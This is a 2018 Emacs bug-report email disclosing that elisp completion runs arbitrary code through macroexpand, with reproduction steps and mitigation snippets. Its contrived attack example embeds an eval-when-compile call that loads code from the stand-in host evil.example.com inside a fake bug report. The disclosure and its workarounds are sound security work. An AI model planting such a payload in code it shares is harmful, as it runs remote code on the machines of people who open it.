From: Wilfred Hughes <me@wilfred.me.uk>
To: 32495@debbugs.gnu.org
Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
Date: Wed, 22 Aug 2018 01:11:55 +0100 [thread overview]
Message-ID: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@mail.gmail.com> (raw)
elisp-completion-at-point calls macroexpand, which may execute arbitrary code.
REPRODUCING
1. Insert this code in a buffer in emacs-lisp-mode.
(let ((foo (eval-when-compile (debug))))
x)
2. Put point on x.
3. Press C-M-i, or M-x elisp-completion-at-point.
4. Observe that the debugger is opened, because code is being executed!
SEVERITY
I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:
(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
;; ... lots of code
(bar 1))
;; Dear maintainer, I've found a bug in your completion. Please try
;; completion in the following:
abc
)
This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.
WORKAROUNDS
When calling macroexpand or macroexpand-all, either:
1. pass in an environment with all untrusted macros replaced with dummies:
(let ((macro-whitelist '(when pcase))
all-macros
safe-env)
(mapatoms
(lambda (sym)
(when (macrop sym)
(push sym all-macros))))
(mapc
(lambda (sym)
(unless (memq sym macro-whitelist)
(push (cons sym (symbol-function 'ignore))
safe-env)))
all-macros)
(macroexpand-all
arbitrary-form-here
safe-env))
2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):
(cl-letf (((symbol-function 'eval) #'ignore)
((symbol-function 'eval-region) #'ignore)
((symbol-function 'eval-buffer) #'ignore)
((symbol-function 'backtrace-eval) #'ignore))
(macroexpand-all some-arbitrary-form-here))
next reply other threads:[~2018-08-22 0:11 UTC|newest]
Thread overview: 2+ messages / expand[flat|nested] mbox.gz Atom feed top
2018-08-22 0:11 Wilfred Hughes [this message]
2018-08-23 18:54 ` bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code Stefan Monnier
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: https://www.gnu.org/software/emacs/
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@mail.gmail.com \
--to=me@wilfred.me.uk \
--cc=32495@debbugs.gnu.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
Code repositories for project(s) associated with this public inbox
https://git.savannah.gnu.org/cgit/emacs.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).